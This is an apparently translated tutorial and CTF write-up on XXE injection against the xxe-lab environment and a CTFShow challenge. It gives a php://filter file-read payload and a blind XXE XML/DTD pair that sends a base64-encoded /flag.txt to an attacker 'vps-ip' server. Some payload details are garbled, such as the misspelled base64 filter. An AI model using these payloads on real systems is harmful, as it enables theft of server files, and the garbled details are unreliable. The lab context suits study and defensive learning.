Vulnerability principle
The XE vulnerability occurs when the application is parsing the XML input without prohibiting the loading of external entities, causing malicious external files to be loaded, resulting in file reading, command execution, and intranet port scanning. The XXE vulnerability is often triggered by the location where the XML file can be uploaded. The uploaded XML file is not filtered, resulting in the upload of malicious XML files.
Environment setup
Address: https://github.com/c0ny1/xxe-lab After
downloading, put PHP_XXE in the www directory of PHPstudy to access
XXE has echo injection
First grab the packet at the login, you can see that the parameter transfer format is XML, and there may be XML injection.
Send the data packet to the Repeater module for the next analysis.
You can see that the content echoed in the response packet is username, and then use the XXE vulnerability to read the file.
It can be read directly when reading the txt file, but when reading the php file, the php code may not be displayed due to the browser's parsing. This requires base64 encoding of the code before reading it out.
php://filter/read=convert.base64-encode/resource=文件地址
Base64 decoding can get the content of abc.php
XXE no echo injection
When a Web program can parse XML input, but there is no output response, this kind of injection is called blind injection XXE. So in order to test this blind XXE, we can use an external entity other than the file path to request the web application here.
Here is a topic from CTFShow to explain.
https://ctf.show/challenges#web4_%E8%A7%82%E5%BF%83-340
Click for divination, grab the packet to see the data. Seeing that it requested an external xml, it can be speculated that there is XXE injection.
At the same time, because the request is initiated from a server on the public network, we need to construct an attack chain on our own server.
First, open the Apache service and place the files we constructed under /var/www/html so that we can access it.
service apache2 start
Create a test.xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert-base64.encode/resource=/flag.txt">
<!ENTITY % remote SYSTEM "http://vps-ip/test.dtd">
%remote;
%dtd;
%xxe;
]>
Create a test.dtd
<!ENTITY % dtd "<!ENTITY xxe SYSTEM 'http://vps-ip/pass=%file;'>">
%dtd;
%xxe;
Then initiate a request to
get the flag.